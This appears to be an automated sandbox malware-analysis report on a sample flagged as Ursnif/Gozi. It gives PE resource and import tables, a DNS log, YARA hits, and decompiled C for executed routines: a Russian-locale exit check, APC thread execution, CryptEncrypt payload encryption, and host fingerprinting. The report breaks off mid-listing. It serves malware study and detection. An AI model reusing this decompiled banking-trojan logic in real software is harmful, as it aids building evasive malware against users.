            RT_STRING | 0x276a4c8 | 0x4b0 | data | Sami Lappish | Finland
            RT_STRING | 0x276a4c8 | 0x4b0 | data | Sami Lappish | Norway
            RT_STRING | 0x276a4c8 | 0x4b0 | data | Sami Lappish | Sweden
            RT_STRING | 0x276a978 | 0x588 | data | Sami Lappish | Finland
            RT_STRING | 0x276a978 | 0x588 | data | Sami Lappish | Norway
            RT_STRING | 0x276a978 | 0x588 | data | Sami Lappish | Sweden
            RT_STRING | 0x276af00 | 0x5d2 | data | Sami Lappish | Finland
            RT_STRING | 0x276af00 | 0x5d2 | data | Sami Lappish | Norway
            RT_STRING | 0x276af00 | 0x5d2 | data | Sami Lappish | Sweden
            RT_STRING | 0x276b4d8 | 0x58 | data | Sami Lappish | Finland
            RT_STRING | 0x276b4d8 | 0x58 | data | Sami Lappish | Norway
            RT_STRING | 0x276b4d8 | 0x58 | data | Sami Lappish | Sweden
            RT_ACCELERATOR | 0x2769c60 | 0x78 | data | Sami Lappish | Finland
            RT_ACCELERATOR | 0x2769c60 | 0x78 | data | Sami Lappish | Norway
            RT_ACCELERATOR | 0x2769c60 | 0x78 | data | Sami Lappish | Sweden
            RT_ACCELERATOR | 0x2769bb8 | 0xa8 | data | Sami Lappish | Finland
            RT_ACCELERATOR | 0x2769bb8 | 0xa8 | data | Sami Lappish | Norway
            RT_ACCELERATOR | 0x2769bb8 | 0xa8 | data | Sami Lappish | Sweden
            RT_GROUP_ICON | 0x275c0a0 | 0x30 | data | Sami Lappish | Finland
            RT_GROUP_ICON | 0x275c0a0 | 0x30 | data | Sami Lappish | Norway
            RT_GROUP_ICON | 0x275c0a0 | 0x30 | data | Sami Lappish | Sweden
            RT_GROUP_ICON | 0x2758180 | 0x22 | data | Sami Lappish | Finland
            RT_GROUP_ICON | 0x2758180 | 0x22 | data | Sami Lappish | Norway
            RT_GROUP_ICON | 0x2758180 | 0x22 | data | Sami Lappish | Sweden
            RT_GROUP_ICON | 0x2762890 | 0x76 | data | Sami Lappish | Finland
            RT_GROUP_ICON | 0x2762890 | 0x76 | data | Sami Lappish | Norway
            RT_GROUP_ICON | 0x2762890 | 0x76 | data | Sami Lappish | Sweden
            RT_GROUP_ICON | 0x2768820 | 0x68 | data | Sami Lappish | Finland
            RT_GROUP_ICON | 0x2768820 | 0x68 | data | Sami Lappish | Norway
            RT_GROUP_ICON | 0x2768820 | 0x68 | data | Sami Lappish | Sweden
            RT_VERSION | 0x2769d18 | 0x2d4 | data | |
            None | 0x2769cd8 | 0xa | data | Sami Lappish | Finland
            None | 0x2769cd8 | 0xa | data | Sami Lappish | Norway
            None | 0x2769cd8 | 0xa | data | Sami Lappish | Sweden
            None | 0x2769ce8 | 0xa | data | Sami Lappish | Finland
            None | 0x2769ce8 | 0xa | data | Sami Lappish | Norway
            None | 0x2769ce8 | 0xa | data | Sami Lappish | Sweden
            None | 0x2769cf8 | 0xa | data | Sami Lappish | Finland
            None | 0x2769cf8 | 0xa | data | Sami Lappish | Norway
            None | 0x2769cf8 | 0xa | data | Sami Lappish | Sweden
            None | 0x2769d08 | 0xa | data | Sami Lappish | Finland
            None | 0x2769d08 | 0xa | data | Sami Lappish | Norway
            None | 0x2769d08 | 0xa | data | Sami Lappish | Sweden
            DLL | Import
            KERNEL32.dll | SetDefaultCommConfigA, CreateMutexW, GetStringTypeA, GlobalCompact, _llseek, BuildCommDCBAndTimeoutsA, EnumCalendarInfoW, VerSetConditionMask, GetConsoleAliasA, GetCurrentActCtx, WriteConsoleInputA, SetEvent, GetModuleHandleW, EnumTimeFormatsW, InitializeCriticalSection, LoadLibraryW, GetFileAttributesA, TransactNamedPipe, WritePrivateProfileSectionW, TerminateProcess, IsDBCSLeadByte, lstrcmpW, GlobalUnlock, SetCurrentDirectoryA, GetCPInfoExW, SetLastError, GetProcAddress, PeekConsoleInputW, GetFirmwareEnvironmentVariableW, SearchPathA, OpenWaitableTimerA, GetProcessId, LocalAlloc, SetCalendarInfoW, FindFirstVolumeMountPointW, GlobalGetAtomNameW, AddAtomA, WaitForMultipleObjects, EnumResourceTypesW, GetPrivateProfileSectionNamesA, FindNextFileA, FreeEnvironmentStringsW, GetWindowsDirectoryW, DeleteFileW, EnumCalendarInfoExA, CopyFileExA, SetStdHandle, WriteConsoleW, GetLastError, MoveFileA, WideCharToMultiByte, HeapAlloc, DeleteFileA, GetCommandLineA, HeapSetInformation, GetStartupInfoW, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, DecodePointer, TlsFree, GetCurrentThreadId, GetCurrentThread, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCurrentProcess, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, HeapCreate, HeapDestroy, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameA, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringW, MultiByteToWideChar, GetStringTypeW, FatalAppExitA, HeapFree, Sleep, IsProcessorFeaturePresent, GetLocaleInfoW, SetConsoleCtrlHandler, FreeLibrary, InterlockedExchange, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, RtlUnwind, HeapReAlloc, HeapSize, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, CreateFileW
            USER32.dll | LoadMenuW
            Language of compilation system | Country where language is spoken
            Sami Lappish | Finland
            Sami Lappish | Norway
            Sami Lappish | Sweden


            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Mar 24, 2023 14:02:14.183909893 CET | 58595 | 53 | 192.168.2.6 | 8.8.8.8
            Mar 24, 2023 14:02:14.220094919 CET | 53 | 58595 | 8.8.8.8 | 192.168.2.6

            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
            Mar 24, 2023 14:02:14.183909893 CET | 192.168.2.6 | 8.8.8.8 | 0x81e3 | Standard query (0) | checklist.skype.com | A (IP address) | IN (0x0001) | false

            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
            Mar 24, 2023 14:02:14.220094919 CET | 8.8.8.8 | 192.168.2.6 | 0x81e3 | Name error (3) | checklist.skype.com | none | none | A (IP address) | IN (0x0001) | false

            Target ID: 0
            Start time: 14:01:20
            Start date: 24/03/2023
            Path: C:\Users\user\Desktop\server.exe
            Wow64 process (32bit): true
            Commandline: C:\Users\user\Desktop\server.exe
            Imagebase: 0x400000
            File size: 251904 bytes
            MD5 hash: 62C6ED30422B5876110EE6AB6660223E
            Has elevated privileges: true
            Has administrator privileges: true
            Programmed in: C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.524385059.0000000002BA6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.524298163.0000000002B80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.524890605.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            Reputation: low

            Executed Functions

            Control-flow Graph

            C-Code - Quality: 85%
            			E004019F1() {
            				long _v8;
            				char _v12;
            				char _v16;
            				void* _v40;
            				long _t28;
            				long _t30;
            				long _t31;
            				signed short _t33;
            				void* _t37;
            				long _t40;
            				long _t41;
            				void* _t48;
            				intOrPtr _t50;
            				signed int _t57;
            				signed int _t58;
            				long _t63;
            				long _t65;
            				intOrPtr _t66;
            				void* _t71;
            				void* _t75;
            				signed int _t77;
            				signed int _t78;
            				void* _t82;
            				intOrPtr* _t83;
            
            				_t28 = E00401D68();
            				_v8 = _t28;
            				if(_t28 != 0) {
            					return _t28;
            				}
            				do {
            					_t77 = 0;
            					_v12 = 0;
            					_t63 = 0x30;
            					do {
            						_t71 = E004012E6(_t63);
            						if(_t71 == 0) {
            							_v8 = 8;
            						} else {
            							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
            							_t67 = _t57;
            							_t58 = _t57 & 0x0000ffff;
            							_v8 = _t58;
            							if(_t58 == 4) {
            								_t63 = _t63 + 0x30;
            							}
            							_t78 = 0x13;
            							_t10 = _t67 + 1; // 0x1
            							_t77 =  *_t71 % _t78 + _t10;
            							E00401BA9(_t71);
            						}
            					} while (_v8 != 0);
            					_t30 = E00401688(_t77); // executed
            					_v8 = _t30;
            					Sleep(_t77 << 4); // executed
            					_t31 = _v8;
            				} while (_t31 == 0x15);
            				if(_t31 != 0) {
            					L30:
            					return _t31;
            				}
            				_v12 = 0;
            				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
            				if(_t33 == 0) {
            					__imp__GetSystemDefaultUILanguage();
            					_t67 =  &_v12;
            					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
            				}
            				if(_v12 == 0x5552) {
            					L28:
            					_t31 = _v8;
            					if(_t31 == 0xffffffff) {
            						_t31 = GetLastError();
            					}
            					goto L30;
            				} else {
            					if(E00401800(_t67,  &_v16) != 0) {
            						 *0x404178 = 0;
            						L20:
            						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x404180, 0, 0); // executed
            						_t82 = _t37;
            						if(_t82 == 0) {
            							L27:
            							_v8 = GetLastError();
            							goto L28;
            						}
            						_t40 = QueueUserAPC(E0040139F, _t82,  &_v40); // executed
            						if(_t40 == 0) {
            							_t65 = GetLastError();
            							TerminateThread(_t82, _t65);
            							CloseHandle(_t82);
            							_t82 = 0;
            							SetLastError(_t65);
            						}
            						if(_t82 == 0) {
            							goto L27;
            						} else {
            							_t41 = WaitForSingleObject(_t82, 0xffffffff);
            							_v8 = _t41;
            							if(_t41 == 0) {
            								GetExitCodeThread(_t82,  &_v8);
            							}
            							CloseHandle(_t82);
            							goto L28;
            						}
            					}
            					_t66 = _v16;
            					_t83 = __imp__GetLongPathNameW;
            					_t48 =  *_t83(_t66, 0, 0); // executed
            					_t75 = _t48;
            					if(_t75 == 0) {
            						L18:
            						 *0x404178 = _t66;
            						goto L20;
            					}
            					_t22 = _t75 + 2; // 0x2
            					_t50 = E004012E6(_t75 + _t22);
            					 *0x404178 = _t50;
            					if(_t50 == 0) {
            						goto L18;
            					}
            					 *_t83(_t66, _t50, _t75); // executed
            					E00401BA9(_t66);
            					goto L20;
            				}
            			}

            APIs
              • Part of subcall function 00401D68: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
              • Part of subcall function 00401D68: GetVersion.KERNEL32 ref: 00401D86
              • Part of subcall function 00401D68: GetCurrentProcessId.KERNEL32 ref: 00401DA2
              • Part of subcall function 00401D68: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
              • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
            • NtQuerySystemInformation.NTDLL ref: 00401A26
            • Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
            • GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
            • GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
            • VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
            • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
            • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
            • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 00401B27
            • QueueUserAPC.KERNELBASE(0040139F,00000000,?,?,00000000), ref: 00401B3D
            • GetLastError.KERNEL32(?,00000000), ref: 00401B4D
            • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B57
            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B5E
            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00401B63
            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401B70
            • GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B82
            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B89
            • GetLastError.KERNEL32(?,00000000), ref: 00401B8D
            • GetLastError.KERNEL32(?,00000000), ref: 00401B9E
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
            • String ID:
            • API String ID: 3475612337-0
            • Opcode ID: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
            • Instruction ID: e4abbca9115d716754b6864e37b0832fe911a2439c52af45cdd796d0275508de
            • Opcode Fuzzy Hash: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
            • Instruction Fuzzy Hash: 4E519E71901214ABE721AFA59D48EAFBA7CAB45755F104177F901F32A0EB389A40CB68
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            [Control-flow graph rendering omitted; legend: Executed / Not Executed; basic blocks 0x47e1508-0x47e16af]
            C-Code - Quality: 50%
            			E047E1508(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
            				int _v8;
            				long* _v12;
            				int _v16;
            				void* _v20;
            				long* _v24;
            				void* _v39;
            				char _v40;
            				void _v56;
            				int _v60;
            				intOrPtr _v64;
            				void _v67;
            				char _v68;
            				void* _t61;
            				int _t68;
            				signed int _t76;
            				int _t79;
            				int _t81;
            				void* _t85;
            				long _t86;
            				int _t90;
            				signed int _t94;
            				int _t101;
            				void* _t102;
            				int _t103;
            				void* _t104;
            				void* _t105;
            				void* _t106;
            
            				_t103 = __eax;
            				_t94 = 6;
            				_v68 = 0;
            				memset( &_v67, 0, _t94 << 2);
            				_t105 = _t104 + 0xc;
            				asm("stosw");
            				asm("stosb");
            				_v40 = 0;
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosw");
            				asm("stosb");
            				_t61 =  *0x47ea0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
            				if(_t61 == 0) {
            					_a8 = GetLastError();
            				} else {
            					_t101 = 0x10;
            					memcpy( &_v56, _a8, _t101);
            					_t106 = _t105 + 0xc;
            					_v60 = _t101;
            					_v67 = 2;
            					_v64 = 0x660e;
            					_v68 = 8;
            					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
            					if(_t68 == 0) {
            						_a8 = GetLastError();
            					} else {
            						_push(0);
            						_push( &_v40);
            						_push(1);
            						_push(_v12);
            						if( *0x47ea0e4() == 0) {
            							_a8 = GetLastError();
            						} else {
            							_t18 = _t103 + 0xf; // 0x10
            							_t76 = _t18 & 0xfffffff0;
            							if(_a4 != 0 && _t76 == _t103) {
            								_t76 = _t76 + _t101;
            							}
            							_t102 = E047E33DC(_t76);
            							_v20 = _t102;
            							if(_t102 == 0) {
            								_a8 = 8;
            							} else {
            								_v16 = 0;
            								_a8 = 0;
            								while(1) {
            									_t79 = 0x10;
            									_v8 = _t79;
            									if(_t103 <= _t79) {
            										_v8 = _t103;
            									}
            									memcpy(_t102, _a12, _v8);
            									_t81 = _v8;
            									_a12 = _a12 + _t81;
            									_t103 = _t103 - _t81;
            									_t106 = _t106 + 0xc;
            									if(_a4 == 0) {
            										_t85 =  *0x47ea0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
            									} else {
            										_t85 =  *0x47ea0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
            									}
            									if(_t85 == 0) {
            										break;
            									}
            									_t90 = _v8;
            									_v16 = _v16 + _t90;
            									_t102 = _t102 + _t90;
            									if(_t103 != 0) {
            										continue;
            									} else {
            										L17:
            										 *_a16 = _v20;
            										 *_a20 = _v16;
            									}
            									goto L21;
            								}
            								_t86 = GetLastError();
            								_a8 = _t86;
            								if(_t86 != 0) {
            									E047E61DA(_v20);
            								} else {
            									goto L17;
            								}
            							}
            						}
            						L21:
            						CryptDestroyKey(_v12);
            					}
            					CryptReleaseContext(_v24, 0);
            				}
            				return _a8;
            			}

            APIs
            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,047E5088,00000001,047E3ECE,00000000), ref: 047E1540
            • memcpy.NTDLL(047E5088,047E3ECE,00000010,?,?,?,047E5088,00000001,047E3ECE,00000000,?,047E66D9,00000000,047E3ECE,?,76B5C740), ref: 047E1559
            • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 047E1582
            • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 047E159A
            • memcpy.NTDLL(00000000,76B5C740,05429600,00000010), ref: 047E15EC
            • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05429600,00000020,?,?,00000010), ref: 047E1615
            • GetLastError.KERNEL32(?,?,00000010), ref: 047E1644
            • GetLastError.KERNEL32 ref: 047E1676
            • CryptDestroyKey.ADVAPI32(00000000), ref: 047E1682
            • GetLastError.KERNEL32 ref: 047E168A
            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 047E1697
            • GetLastError.KERNEL32(?,?,?,047E5088,00000001,047E3ECE,00000000,?,047E66D9,00000000,047E3ECE,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E169F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
            • String ID: @MetNet
            • API String ID: 3401600162-2109406137
            • Opcode ID: 32f542c332a94904128dc0d34b9b5e65bae7b954120b4b2e6fb0230d9559bb2a
            • Instruction ID: 681ddcf83e2e79da15e6500c3bc36cc23806c9203a028502e1637b5b7756a819
            • Opcode Fuzzy Hash: 32f542c332a94904128dc0d34b9b5e65bae7b954120b4b2e6fb0230d9559bb2a
            • Instruction Fuzzy Hash: AC516BB1900209FFDB10DFA6CC89AEE7BB9FB08340F448629F915E6240E7749E14DB60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            [Control-flow graph rendering omitted; legend: Executed / Not Executed; basic blocks 0x47e3bd3-0x47e3cdf]
            C-Code - Quality: 96%
            			E047E3BD3(char __eax, void* __esi) {
            				long _v8;
            				char _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v28;
            				long _t34;
            				signed int _t39;
            				long _t50;
            				char _t59;
            				intOrPtr _t61;
            				void* _t62;
            				void* _t64;
            				char _t65;
            				intOrPtr* _t67;
            				void* _t68;
            				void* _t69;
            
            				_t69 = __esi;
            				_t65 = __eax;
            				_v8 = 0;
            				_v12 = __eax;
            				if(__eax == 0) {
            					_t59 =  *0x47ea310; // 0xd448b889
            					_v12 = _t59;
            				}
            				_t64 = _t69;
            				E047E71CD( &_v12, _t64);
            				if(_t65 != 0) {
            					 *_t69 =  *_t69 ^  *0x47ea344 ^ 0x6c7261ae;
            				} else {
            					GetUserNameW(0,  &_v8); // executed
            					_t50 = _v8;
            					if(_t50 != 0) {
            						_t62 = RtlAllocateHeap( *0x47ea2d8, 0, _t50 + _t50);
            						if(_t62 != 0) {
            							if(GetUserNameW(_t62,  &_v8) != 0) {
            								_t64 = _t62;
            								 *_t69 =  *_t69 ^ E047E56B9(_v8 + _v8, _t64);
            							}
            							HeapFree( *0x47ea2d8, 0, _t62);
            						}
            					}
            				}
            				_t61 = __imp__;
            				_v8 = _v8 & 0x00000000;
            				GetComputerNameW(0,  &_v8);
            				_t34 = _v8;
            				if(_t34 != 0) {
            					_t68 = RtlAllocateHeap( *0x47ea2d8, 0, _t34 + _t34);
            					if(_t68 != 0) {
            						if(GetComputerNameW(_t68,  &_v8) != 0) {
            							_t64 = _t68;
            							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E047E56B9(_v8 + _v8, _t64);
            						}
            						HeapFree( *0x47ea2d8, 0, _t68);
            					}
            				}
            				asm("cpuid");
            				_t67 =  &_v28;
            				 *_t67 = 1;
            				 *((intOrPtr*)(_t67 + 4)) = _t61;
            				 *((intOrPtr*)(_t67 + 8)) = 0;
            				 *(_t67 + 0xc) = _t64;
            				_t39 = _v16 ^ _v20 ^ _v28;
            				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
            				return _t39;
            			}

            APIs
            • GetUserNameW.ADVAPI32(00000000,?), ref: 047E3C0A
            • RtlAllocateHeap.NTDLL(00000000,?), ref: 047E3C21
            • GetUserNameW.ADVAPI32(00000000,?), ref: 047E3C2E
            • HeapFree.KERNEL32(00000000,00000000), ref: 047E3C4F
            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 047E3C76
            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 047E3C8A
            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 047E3C97
            • HeapFree.KERNEL32(00000000,00000000), ref: 047E3CB5
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: HeapName$AllocateComputerFreeUser
            • String ID: Uet
            • API String ID: 3239747167-2766386878
            • Opcode ID: 54d54c34bb629916fe833c15dcf24cc2b55ccfa3f294ad05b3c9954166dd8f96
            • Instruction ID: 789a1d6462c3b0267a13a5d9e76fbb5e5f932ce2ecc422b881def30bd11c2175
            • Opcode Fuzzy Hash: 54d54c34bb629916fe833c15dcf24cc2b55ccfa3f294ad05b3c9954166dd8f96
            • Instruction Fuzzy Hash: F6312AB2A00205EFD710DFAACD81ABAB7F9EB8C700F518629E905D7250E734EE149B10
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 38%
            			E047E421F(char _a4, void* _a8) {
            				void* _v8;
            				void* _v12;
            				char _v16;
            				void* _v20;
            				char _v24;
            				char _v28;
            				char _v32;
            				char _v36;
            				char _v40;
            				void* _v44;
            				void** _t33;
            				void* _t40;
            				void* _t43;
            				void** _t44;
            				intOrPtr* _t47;
            				char _t48;
            
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				_v20 = _a4;
            				_t48 = 0;
            				_v16 = 0;
            				_a4 = 0;
            				_v44 = 0x18;
            				_v40 = 0;
            				_v32 = 0;
            				_v36 = 0;
            				_v28 = 0;
            				_v24 = 0;
            				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
            					_t33 =  &_v8;
            					__imp__(_v12, 8, _t33);
            					if(_t33 >= 0) {
            						_t47 = __imp__;
            						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
            						_t44 = E047E33DC(_a4);
            						if(_t44 != 0) {
            							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
            							if(_t40 >= 0) {
            								memcpy(_a8,  *_t44, 0x1c);
            								_t48 = 1;
            							}
            							E047E61DA(_t44);
            						}
            						NtClose(_v8); // executed
            					}
            					NtClose(_v12);
            				}
            				return _t48;
            			}

            APIs
            • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 047E4266
            • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 047E4279
